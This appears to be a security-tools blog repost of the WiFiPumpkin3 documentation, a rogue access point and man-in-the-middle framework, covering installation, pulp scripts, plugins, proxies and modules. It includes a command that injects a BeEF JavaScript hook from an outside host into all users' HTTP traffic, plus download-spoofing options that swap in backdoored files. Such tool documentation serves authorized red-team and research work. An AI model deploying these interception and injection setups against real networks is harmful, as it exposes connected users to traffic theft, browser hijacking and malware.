WiFiPumpkin3 is powerful framework for rogue access point attack, written in Python, that allow and offer to security researchers, red teamers and reverse engineers to mount a wireless network to conduct a man-in-the-middle attack.
Main Features
Supported Platforms
NOTE: The Wp3 require hostapd installed by default
Installation
The wifipumpkin3 written in Python 3
, you will need to have a working Python (version 3.7 or later) on your machine.
Note that
Also Read – PowerSploit : A PowerShell Post-Exploitation Framework
Requirements
You will need to have a Wi-Fi adapter that supports Access-Point (AP) mode. The following list of OSs represents recommended environments to run wifipumpkin3
(wp3), as most of required dependencies are pre-installed. VMs or docker are also recommended.
OS | Version |
---|---|
Ubuntu | 18.04 LTS bionic |
Docker | Ubuntu 18.04.4 LTS bionic |
Based On Debian Procedure
wifipumpkin3 use the port 53 for mount python dns server, when i try to install on Ubuntu 18.04, i got somes error because this “port 53 is used by another process”. This problem is caused by systemd-resolved to solve only follow the step bellow.
sudo ln -sf /run/systemd/resolve/resolv.conf /etc/resolv.conf
Installation Procedure
if you’ve python 3.7 or later installed on your machine, it very simple to install the Wp3. Follow the steps:
Debian/Ubuntu
It is highly recommended install somes system packages, os-level dependencies.
sudo apt install python3.7-dev libssl-dev libffi-dev build-essential python3.7
$ git clone https://github.com/P0cL4bs/wifipumpkin3.git
$ cd wifipumpkin3
$ sudo make install
or grab a Debian *.deb
package from GitHub Releases
$ sudo dpkg -i wifipumpkin3-1.0.0-all.deb
Install on Kali Linux
the Kali Linux by default has installed python3.8 is compartible with wp3
, I recommend to install somes system packages, os-level dependencies.
$ sudo apt install libssl-dev libffi-dev build-essential
$ git clone https://github.com/P0cL4bs/wifipumpkin3.git
$ cd wifipumpkin3
now, we need to install the PyQt5
, it very easy:
sudo apt install python3-pyqt5
or check if the pyqt5 is installed successful:
python3 -c “from PyQt5.QtCore import QSettings; print(‘done’)”
now, if you got the message done
, nice. the next step is install the wp3
:
$ sudo python3 setup.py install
if you see this message bellow, everything ok !
Finished processing dependencies for wifipumpkin3==1.0.0
now, let’s execute the app:
$ sudo wifipumpkin3
all done, will be see the CLI of wp3
.
Installation python virtualenv
Virtualenv is a tool used to create an isolated Python environment. Virtualenv is the easiest and recommended way to configure a custom Python environment.
version of PyQt5
for install change in file requirements.txt the version of Qt5, `PyQt5==5.14.0` to `PyQt5==5.14.2`. This version 5.14.2 work fine on virtualenv without error with python-sip depedencies.
$ sudo python3.7 -m pip install –upgrade pip
$ git clone https://github.com/P0cL4bs/wifipumpkin3.git
$ cd wifipumpkin3
$ sudo python3.7 -m pip install virtualenv
now, you need execute with superuser root
:
# virtualenv -p python3.7 venv
# source venv/bin/activate
# make install_env
if you see this message bellow, everything ok !
Finished processing dependencies for wifipumpkin3==1.0.0
now, let’s execute the app:
# wifipumpkin3
all done, will be see the CLI of wp3
on virtualenv activated.
When finished working in the virtual environment, you can deactivate it by running the following:
# deactivate
Installation on Docker Container
Docker is an open platform for developing, shipping, and running applications. Docker enables you to separate your applications from your infrastructure so you can deliver software quickly. the wp3
is full compatible to run on docker container. let’s go:
https://docs.docker.com/get-docker/
with docker.io installed and working fine, let’s take a look how to mount a container with wp3
. how to install on ubuntu
$ git clone https://github.com/P0cL4bs/wifipumpkin3.git
$ cd wifipumpkin3
$ sudo docker build -t “wifipumpkin3”
this commands above will download and build a new container for us called wifipumpkin3
, You’ll see Docker step through each instruction in your Dockerfile, building up your image as it goes. If successful, the build process should end with a message:
Successfully tagged wifipumpkin3
Now you need to run your image as a container, start a container based on your new image:
$ sudo docker run –privileged -ti –rm –name wifipumpkin3 –net host “wifipumpkin3”
all done, will be see the CLI of wp3
on docker with mode docker activated. 😉
About wireless adapters
Your wireless adapter and your kernel driver must support AP mode. In order to check this, execute this shell command:
iw list
If there is ‘AP’ in the list of “Supported interface modes”, your card has support for the desired mode.
Another method:
lspci -k | grep -A 3 -i network
(example module: ath9k) next, use the below command to find out your wifi capabilities (replace ath9k by your kernel driver): modinfo ath9k | grep depend
If the above output includes “mac80211” then it means your wifi card will support the AP mode.The adapter needs to have drivers for GNU/Linux.
Usage
Interactive Session
Once started the tool with sudo wifipumpkin3
, you’ll be presented with an interactive session like the metasploit framework
where you can enable or disable modules, plugin, proxy configure the ap and etc.
The interface CLI is very simple, basic commands you’ll need to perform operations such as setting a session like accesspoint (AP) information (bssid, channel, interface), start/stop accesspoint and monitor clients activitys joined on AP.
Pulps
Pulps
makes reference to pulp taken from a pumpkin, which can be used for various mixtures. It is possible to script your interactive session using pulps files. Pulps (script files with a .pulp extension) are a powerful way to automate your attack, like metasploit’s .rc
files, where each line of the file is a command that’ll be executed one for one.
let’s take a look, how to create a script for set the interface, enable to start without proxy,set ssid the network, set work without log for dns and start the access point.
# configure the interface
set interface wlan1
# set name of access point will be created
set ssid demo
# set noproxy plguin
set proxy noproxy
# ignore all log from pydns_server
ignore pydns_server
# start the Access Point
start
Once saved as demo.pulp file, you’ll be able to load and execute it via:
sudo wifipumpkin3 –pulp /path/to/demo.pulp
if you not want to use .pulp file, exist a options to use the paraments –xpulp or -x and each command can either be executed singularly, or concatenated by the ;
in string. for example:
sudo wifipumpkin3 –xpulp “set interface wlan1; set ssid demo; set proxy noproxy; start”
Arguments Commands
The basic command line arguments ( wifipumpkin3 -h ) are:
-i INTERFACE
Network interface to bind to, if empty the default interface is old session started.
-s SESSION
Session for continue attack, if you pass the old session id, all log will be added on same session.
–pulp PULP
Interactive sessions can be scripted with .pulp file,a powerful way to automate your attack.
–xpulp XPULP
each command can either be executed singularly, or concatenated by the ; in string.
–wireless-mode WIRELESS_MODE
Use this options for set the wireless mode (static, docker), by default is static
mode, but you can change if you want to run on docker container.
–no-colors
disable terminal colors and effects.
-v, –version
show program’s version number and exit.
Core Commands
jobs
mode
plugins
proxys
show
search
use
Examples
Plugins
The plugins are designed to add features to WP3 core and run parallel with access point (AP), WP3 provides facilities to develop plugins. Generally speaking, there is really a few things you have to do in order to get a plugin working.
Info
The most important is you can run multi plugins simultaneously, because the plugins has been designed to work only monitor and analyse the traffic generate by users connected on access point.
The basic command guidelines to get a plugins are:
if you want to enable or disable the plugin, follow command bellow.
wp3 > set plugin plugin_name true/false
if the plugin has subplugins, when type plugins
you see somes options for set. you can to enable/disable subplugins with command, type tab
to autocomplete ;):
wp3 > set plugin_name.subplugins_name true/false
Plugin developers and users are welcome to include your plugin into this project, take a look the guidelines how to create a plugin.
Proxys
The Proxys are designed to add features to WP3 core and run parallel with access point (AP), but redirect all traffic with iptables
. Proxies work by intercepting a request, modifying the request if necessary, then handling or forwarding the request to its destination. When a user connects to a AP, the transparent proxy intercepts the request before passing it on to the provider.
Info
The most important is you can run one proxies each time , because the proxies has been designed to work for manipulate data packets redirecting all data for a specific port number
Available Porxy’s:
The basic command guidelines to get a plugins are:
if you want to select the proxy, follow command bellow.
wp3 > set proxy proxy_name
if the proxy has plugins, when type proxys
you see somes options for set. you can to enable/disable plugin command, type tab
to autocomplete ;):
wp3 > set proxy_name.plugin_name true/false
The example above is for enable/disable a plugin, but you can use same syntax to configure plugin parameter. you can see this parameter typing info proxy_name
or using type like this example bellow, using tab
to autocomplete.
wp3 > set pumpkinproxy. pumpkinproxy.beef pumpkinproxy.html_inject pumpkinproxy.beef.url_hook pumpkinproxy.html_inject.content_path pumpkinproxy.downloadspoof pumpkinproxy.js_inject pumpkinproxy.downloadspoof.backdoorExePath pumpkinproxy.js_inject.url pumpkinproxy.downloadspoof.backdoorPDFpath pumpkinproxy.no-cache pumpkinproxy.downloadspoof.backdoorWORDpath pumpkinproxy.replaceImages pumpkinproxy.downloadspoof.backdoorXLSpath pumpkinproxy.replaceImages.path wp3 > set pumpkinproxy.
let now set url_hook
parameter the plugin beef to inject javascript in all request http.
wp3 > set pumpkinproxy.beef.url_hook http://172.16.149.141:3000/hook.js
Proxys developers and users are welcome to include your proxy into this project, take a look the guidelines how to create a proxy.
Modules
A module provides a features that not is necessary to use with access point, the must modules are projected for add a new functionality into attack, like devices discovery
, services enumeration
, perform deauthentication attacks
and etc. Modules are introduced to add more functionalities to complement the attack.
Info
the syntax of modules basically follow the struct the modules of `metasploit`
The basic core command guidelines:
Commands | Descriptions |
---|---|
set | set options for module |
back | go back one level |
help | show avaliable commands |
options | show options of current module |
run | execute module |
Modules developers and users are welcome to include your module into this project, take a look the guidelines how to create a module.
Kali Linux 2024.4, the final release of 2024, brings a wide range of updates and…
This Go program applies a lifetime patch to PowerShell to disable ETW (Event Tracing for…
GPOHunter is a comprehensive tool designed to analyze and identify security misconfigurations in Active Directory…
Across small-to-medium enterprises (SMEs) and managed service providers (MSPs), the top priority for cybersecurity leaders…
The free and open-source security platform SecHub, provides a central API to test software with…
Don't worry if there are any bugs in the tool, we will try to fix…